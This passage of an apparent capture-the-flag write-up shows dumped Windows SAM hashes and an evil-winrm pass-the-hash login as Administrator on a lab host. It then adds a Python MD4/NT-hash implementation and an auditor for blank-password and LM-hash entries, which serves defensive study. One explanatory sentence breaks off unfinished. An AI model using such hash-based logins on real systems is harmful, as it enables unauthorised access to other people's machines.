Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up... 

2b87e7c93a3e8a0ea4a581937016f341.

With evil-winrm, the NT hash can be used directly to open a PowerShell session. This is due to a.

~/Documents/Ctf/Htb/en_cours $ evil-winrm -i 10.129.231.149 -u "Administrator" -H "2b87e7c93a3e8a0ea4a581937016f341"

The session is validated and I retrieve the machine flag.
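Why does the NT hash printed by secretsdump log in directly, with no cracking step? Because the NT hash is an unsalted MD4 of the UTF-16LE password and NTLM authentication uses that value itself as the key, so whoever can read SAM and SYSTEM holds the credential, not a puzzle to solve. That is the defender's reason to treat hive access (and the Backup Operators membership that granted it here) as equivalent to holding every local password. The added Python example below (not part of the original notes, and not Impacket's code) implements MD4 so that hashlib's often-disabled md4 is not needed, derives the NT hash from a password, and audits the secretsdump lines above for blank-password accounts and for stored LM hashes. The sample input is the secretsdump output above; `nt_hash` and `audit_sam_dump` are names chosen here.

```python
import struct


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 as specified in RFC 1320, written out because hashlib's md4 is
    frequently unavailable (OpenSSL legacy provider)."""
    M = 0xFFFFFFFF
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    # Padding: 0x80, zeros up to 56 mod 64, then the bit length little-endian.
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), range(16), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        s = h[:]
        for f, order, shifts, k in rounds:
            for i, idx in enumerate(order):
                # Registers rotate each step: a, then d, then c, then b is updated.
                p = (-i) % 4
                x, y, z = s[(p + 1) % 4], s[(p + 2) % 4], s[(p + 3) % 4]
                s[p] = _rotl((s[p] + f(x, y, z) + X[idx] + k) & M, shifts[i % 4])
        h = [(a + b) & M for a, b in zip(h, s)]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """NT hash as stored in SAM: MD4 over the UTF-16LE password, no salt."""
    return md4(password.encode("utf-16-le")).hex()


EMPTY_NT = nt_hash("")  # 31d6cfe0d16ae931b73c59d7e0c089c0, the blank-password marker
# Value secretsdump prints in the LM column when no LM hash is stored (modern default).
NO_LM = "aad3b435b51404eeaad3b435b51404ee"

# Sample input: the hash lines from the secretsdump output above.
SECRETSDUMP_OUTPUT = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
"""


def parse_secretsdump(text):
    """Rows of user:rid:lmhash:nthash:::, skipping status lines."""
    rows = []
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) >= 4 and parts[1].isdigit() and len(parts[3]) == 32:
            rows.append({"user": parts[0], "rid": int(parts[1]),
                         "lm": parts[2], "nt": parts[3]})
    return rows


def audit_sam_dump(text):
    """{user: [finding, ...]}: blank passwords and stored LM hashes are flagged."""
    report = {}
    for row in parse_secretsdump(text):
        notes = []
        if row["nt"] == EMPTY_NT:
            notes.append("blank password")
        if row["lm"] != NO_LM:
            notes.append("LM hash stored (trivially crackable; disable LM storage)")
        report[row["user"]] = notes
    return report


if __name__ == "__main__":
    for user, notes in audit_sam_dump(SECRETSDUMP_OUTPUT).items():
        print(f"{user}: {', '.join(notes) or 'nothing noteworthy'}")
```

On the output above, Guest and DefaultAccount carry the empty-password hash (both are disabled built-in accounts, which is why the author goes for Administrator), and no LM hashes are stored. The same parser works on the output of `secretsdump.py` run in a sanctioned audit, where the usual follow-ups are to confirm LM storage stays off, to look for the blank-password marker on any enabled account, and to compare local Administrator hashes across hosts, since an identical NT hash on several machines means one shared local password.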